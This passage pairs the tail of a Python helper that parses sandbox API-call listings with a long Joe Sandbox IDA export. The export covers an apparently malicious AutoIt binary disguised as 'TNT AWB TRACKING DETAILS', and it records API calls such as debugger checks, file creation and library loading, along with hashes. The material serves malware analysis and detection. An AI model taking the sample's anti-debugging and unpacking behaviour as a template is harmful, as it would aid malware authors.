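    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]               # resolved argument values; "?" = unresolved by the sandbox
    ref: int                      # address of the call instruction
    caller: Optional[int] = None  # set for "Part of subcall function" entries


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an APIs list into ApiCall records; headings
    such as "APIs"/"Strings" and unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        caller = int(m.group("caller"), 16) if m.group("caller") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), caller))
    return calls


def autoit_script_extraction(calls: List[ApiCall]) -> List[ApiCall]:
    """GetTempFileNameW with the literal prefix 'aut' (its second argument)
    is how the AutoIt runtime names the temp file it unpacks the compiled
    script into, so a resolved 'aut' marks a compiled AutoIt script."""
    return [c for c in calls
            if c.name == "GetTempFileNameW" and len(c.args) > 1 and c.args[1] == "aut"]


DEBUGGER_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}


def debugger_checks(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls (including subcalls) that test for an attached debugger."""
    return [c for c in calls if c.name in DEBUGGER_APIS]


# Documented Win32 values for CreateFileW dwDesiredAccess and dwCreationDisposition.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def describe_createfile(call: ApiCall) -> Optional[str]:
    """Decode access (arg 2) and creation disposition (arg 5) of a CreateFileW
    call so a read-only open and a create/overwrite are told apart at a glance."""
    if call.name != "CreateFileW" or len(call.args) < 5:
        return None
    try:
        access = int(call.args[1], 16)
        disp = int(call.args[4], 16)
    except ValueError:            # "?" or another unresolved value
        return None
    names = [n for bit, n in ACCESS.items() if access & bit] or ["0x%08X" % access]
    return "%s %s" % ("|".join(names), DISPOSITION.get(disp, "0x%X" % disp))


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for c in autoit_script_extraction(calls):
        print("AutoIt script extraction at 0x%08X" % c.ref)
    for c in debugger_checks(calls):
        print("debugger check %s at 0x%08X (subcall 0x%08X)" % (c.name, c.ref, c.caller or 0))
    for c in calls:
        d = describe_createfile(c)
        if d:
            print("CreateFileW at 0x%08X: %s" % (c.ref, d))
```

The parser treats `?` arguments as opaque rather than guessing values, and `describe_createfile` returns `None` when the access or disposition was not resolved, so the output never overstates what the sandbox actually observed.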
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ace6c776c74718864775eabbac9158f399679eeab55c07affc75f5258311bb47
                                                    • Instruction ID: 327b50ce167d2b956182e1b41ea5b51a1181c3fa1ef201683bae87765acccb38
                                                    • Opcode Fuzzy Hash: ace6c776c74718864775eabbac9158f399679eeab55c07affc75f5258311bb47
                                                    • Instruction Fuzzy Hash: ABF13A71A083019FC714DF28C984A6ABBE5FF88324F14892DF899AB351D735E945CF92
                                                    APIs
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EE0193
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EE019B
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EE01A6
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EE01B1
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EE01B9
                                                      • Part of subcall function 00EE0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE01C1
                                                      • Part of subcall function 00ED60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00ECF930), ref: 00ED6154
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00ECF9CD
                                                    • OleInitialize.OLE32(00000000), ref: 00ECFA4A
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F045C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID:
                                                    • API String ID: 1986988660-0
                                                    • Opcode ID: 75bfaed1c7b1a58096b4239f5001a6dd02f12160b905cb7a5755ebdff1970277
                                                    • Instruction ID: d7c706a891999706294221cdfd6e5b0acc1d2e814048c3db768c43766eaf1612
                                                    • Opcode Fuzzy Hash: 75bfaed1c7b1a58096b4239f5001a6dd02f12160b905cb7a5755ebdff1970277
                                                    • Instruction Fuzzy Hash: 9181EEB4901A48CFC784EF79AD646F87BE6FB88B06750812AD418CB372EB704485EF11
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EC4370
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC4415
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EC4432
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: 298203c1763167751c620b19a22c7a9ec9ffd772ca1438a5e2c2ae5d3df0237b
                                                    • Instruction ID: 76f4aa0e4a038191e571bd7e138f85d2054ebebdb2c2a2cb79906f6b96633f69
                                                    • Opcode Fuzzy Hash: 298203c1763167751c620b19a22c7a9ec9ffd772ca1438a5e2c2ae5d3df0237b
                                                    • Instruction Fuzzy Hash: 6231C3B05047058FD721DF24D994BABBBF8FB48708F00092EE69A92291D771A945CB52
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00EE5733
                                                      • Part of subcall function 00EEA16B: __NMSG_WRITE.LIBCMT ref: 00EEA192
                                                      • Part of subcall function 00EEA16B: __NMSG_WRITE.LIBCMT ref: 00EEA19C
                                                    • __NMSG_WRITE.LIBCMT ref: 00EE573A
                                                      • Part of subcall function 00EEA1C8: GetModuleFileNameW.KERNEL32(00000000,00F833BA,00000104,?,00000001,00000000), ref: 00EEA25A
                                                      • Part of subcall function 00EEA1C8: ___crtMessageBoxW.LIBCMT ref: 00EEA308
                                                      • Part of subcall function 00EE309F: ___crtCorExitProcess.LIBCMT ref: 00EE30A5
                                                      • Part of subcall function 00EE309F: ExitProcess.KERNEL32 ref: 00EE30AE
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    • RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000000,?,?,?,00EE0DD3,?), ref: 00EE575F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: e9aa6f97f819318cf3f1fc223e82889ee420de42a5098674bc78f89c92865d83
                                                    • Instruction ID: 9b5c6587ff07fd37a99181af4e62fdb196efd292e4e89ba672cfcb2afb51993d
                                                    • Opcode Fuzzy Hash: e9aa6f97f819318cf3f1fc223e82889ee420de42a5098674bc78f89c92865d83
                                                    • Instruction Fuzzy Hash: CF01F576200B9DDAD6142777EC42A6E77C88F82769F11243BF409BB292DE709C005760
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F29548,?,?,?,?,?,00000004), ref: 00F298BB
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F29548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F298D1
                                                    • CloseHandle.KERNEL32(00000000,?,00F29548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F298D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 6357607d9b303f33f4ed060c0b5a69bb40c9a3f7d732e2d61e21405d0859f54f
                                                    • Instruction ID: ed28605f29ed503c3581014e3770da5c05f97ffb0079af7dbb46e4914a0e0c5d
                                                    • Opcode Fuzzy Hash: 6357607d9b303f33f4ed060c0b5a69bb40c9a3f7d732e2d61e21405d0859f54f
                                                    • Instruction Fuzzy Hash: 98E08636140228B7E7211FA4EC09FDA7B59AB57B70F144120FF18690E087B12515A798
                                                    APIs
                                                    • _free.LIBCMT ref: 00F28D1B
                                                      • Part of subcall function 00EE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE9A24), ref: 00EE2D69
                                                      • Part of subcall function 00EE2D55: GetLastError.KERNEL32(00000000,?,00EE9A24), ref: 00EE2D7B
                                                    • _free.LIBCMT ref: 00F28D2C
                                                    • _free.LIBCMT ref: 00F28D3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                    • Instruction ID: 91d76975dee800b87233270072f1ed3b6ad5342e2afff92e98db422e96c00882
                                                    • Opcode Fuzzy Hash: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                    • Instruction Fuzzy Hash: AAE0C2A1A02A5083CB20A979BC40B8313DC4F483A2744080DB60DE7186CE64F8439024
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    • Opcode ID: ee88899f77137a491913a1297142be56ea5846592613cad0e443f68519b8b9fe
                                                    • Instruction ID: 9b6befd6cadc3f73666c03aec71efc342e55942961eba15e3a5f8e28113a8a4f
                                                    • Opcode Fuzzy Hash: ee88899f77137a491913a1297142be56ea5846592613cad0e443f68519b8b9fe
                                                    • Instruction Fuzzy Hash: 75226970508245CFCB24DF14C555F6AB7E1BF84308F18996DE89AAB362D732EC42DB82
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: EA06
                                                    • API String ID: 4104443479-3962188686
                                                    • Opcode ID: c9851e314ca03625dddca79f4d1f7dd4dc4f95766d8e7e5d4f5732de6b052f21
                                                    • Instruction ID: bcd09471bef13d1709bfaffb1ae5de8da51cc356abae603ceb653b01ae24d051
                                                    • Opcode Fuzzy Hash: c9851e314ca03625dddca79f4d1f7dd4dc4f95766d8e7e5d4f5732de6b052f21
                                                    • Instruction Fuzzy Hash: 63417CA1A041585BDF216B548E71FFE7FF29B45300F28646CEC83BB2C2D6229D4683A1
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00EC4834
                                                      • Part of subcall function 00EE336C: __lock.LIBCMT ref: 00EE3372
                                                      • Part of subcall function 00EE336C: DecodePointer.KERNEL32(00000001,?,00EC4849,00F17C74), ref: 00EE337E
                                                      • Part of subcall function 00EE336C: EncodePointer.KERNEL32(?,?,00EC4849,00F17C74), ref: 00EE3389
                                                      • Part of subcall function 00EC48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EC4915
                                                      • Part of subcall function 00EC48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EC492A
                                                      • Part of subcall function 00EC3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC3B68
                                                      • Part of subcall function 00EC3B3A: IsDebuggerPresent.KERNEL32 ref: 00EC3B7A
                                                      • Part of subcall function 00EC3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F852F8,00F852E0,?,?), ref: 00EC3BEB
                                                      • Part of subcall function 00EC3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00EC3C6F
                                                    • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00EC4874
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: a8494de888e0347f14b2b3d3fde1b37a320b926de713d8010d2260eb3c918647
                                                    • Instruction ID: f69c93925a03d7b96004b59d06911ef0b0e8d294fe0c9a7c6498c6f8e969f10d
                                                    • Opcode Fuzzy Hash: a8494de888e0347f14b2b3d3fde1b37a320b926de713d8010d2260eb3c918647
                                                    • Instruction Fuzzy Hash: 0A11CD728083499BC700EF29E909E5EBFE8EF95750F10451EF444A32B2DB718949DB82
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00EC5821,?,?,?,?), ref: 00EC5CC7
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00EC5821,?,?,?,?), ref: 00EFDD73
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 7295c55d251dd3136984d93f9e701cd6df6758748172b6187374fa34b2eaa442
                                                    • Instruction ID: f13faebf6281640b69ff0aa631dd2f871f6fb5f15264bb6014aa18753f6e8b0f
                                                    • Opcode Fuzzy Hash: 7295c55d251dd3136984d93f9e701cd6df6758748172b6187374fa34b2eaa442
                                                    • Instruction Fuzzy Hash: 29018471144708BEF3200E24CD8AFB67ADCAB0176CF108319FBD5BA1E0C6B62C998B50
                                                    APIs
                                                      • Part of subcall function 00EE571C: __FF_MSGBANNER.LIBCMT ref: 00EE5733
                                                      • Part of subcall function 00EE571C: __NMSG_WRITE.LIBCMT ref: 00EE573A
                                                      • Part of subcall function 00EE571C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000000,?,?,?,00EE0DD3,?), ref: 00EE575F
                                                    • std::exception::exception.LIBCMT ref: 00EE0DEC
                                                    • __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                      • Part of subcall function 00EE859B: RaiseException.KERNEL32(?,?,?,00F79E78,00000000,?,?,?,?,00EE0E06,?,00F79E78,?,00000001), ref: 00EE85F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    APIs
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    • __lock_file.LIBCMT ref: 00EE53EB
                                                      • Part of subcall function 00EE6C11: __lock.LIBCMT ref: 00EE6C34
                                                    • __fclose_nolock.LIBCMT ref: 00EE53F6
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00EC5B96
                                                    Similarity
                                                    • API ID: FilePointer
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    Similarity
                                                    • API ID: _memmove
                                                    Similarity
                                                    • API ID: _wcscmp
                                                    Similarity
                                                    • API ID: _memmove
                                                    APIs
                                                      • Part of subcall function 00EC4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00EC4BEF
                                                      • Part of subcall function 00EE525B: __wfsopen.LIBCMT ref: 00EE5266
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4E0F
                                                      • Part of subcall function 00EC4B6A: FreeLibrary.KERNEL32(00000000), ref: 00EC4BA4
                                                      • Part of subcall function 00EC4C70: _memmove.LIBCMT ref: 00EC4CBA
                                                    Similarity
                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    Similarity
                                                    • API ID: _memmove
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00EC56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00EC5C16
                                                    Similarity
                                                    • API ID: FileRead
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: b03e4753d7403c99c4e3704000c2eb525c496a1073e7f754d424142a3e49a39a
                                                    • Instruction ID: b1b5d26dd4def5d59d6a6bc413444a4572ee26827b1579df0c402e37e5afde0b
                                                    • Opcode Fuzzy Hash: b03e4753d7403c99c4e3704000c2eb525c496a1073e7f754d424142a3e49a39a
                                                    • Instruction Fuzzy Hash: 6401D4B5200942AFC305EB29C941D26F7E9FF853103104169E418C7702D771FC62CBE0
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00EE48A6
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2597487223-0
                                                    • Opcode ID: b5ff1a0011c5185801c2a9f2e4c276e2f6d5aecf2ec28b262a50d0d60eb0ba67
                                                    • Instruction ID: aacd043b6c4bb4125eca04dc33b935822a4f598c5d41c7e625035e5cd51f3713
                                                    • Opcode Fuzzy Hash: b5ff1a0011c5185801c2a9f2e4c276e2f6d5aecf2ec28b262a50d0d60eb0ba67
                                                    • Instruction Fuzzy Hash: 63F0F4718006CCABDF15AFA28C053DE36E0AF00324F10A404F41CB61C1CB788950DB45
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4E7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: cadee79fe736bb5be3a7d10752c214e0c0238ca88f75ed1e191cc4637dc1cefe
                                                    • Instruction ID: f03ddb4301b23b3daed67a0fcd7da2ac4bcd9700521465ae11327f6ea043fa93
                                                    • Opcode Fuzzy Hash: cadee79fe736bb5be3a7d10752c214e0c0238ca88f75ed1e191cc4637dc1cefe
                                                    • Instruction Fuzzy Hash: 10F0A9B1100711CFCB349F24E9A0D56BBF0BF103293219A3EE1DBAA660C3329841DF00
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE07B0
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
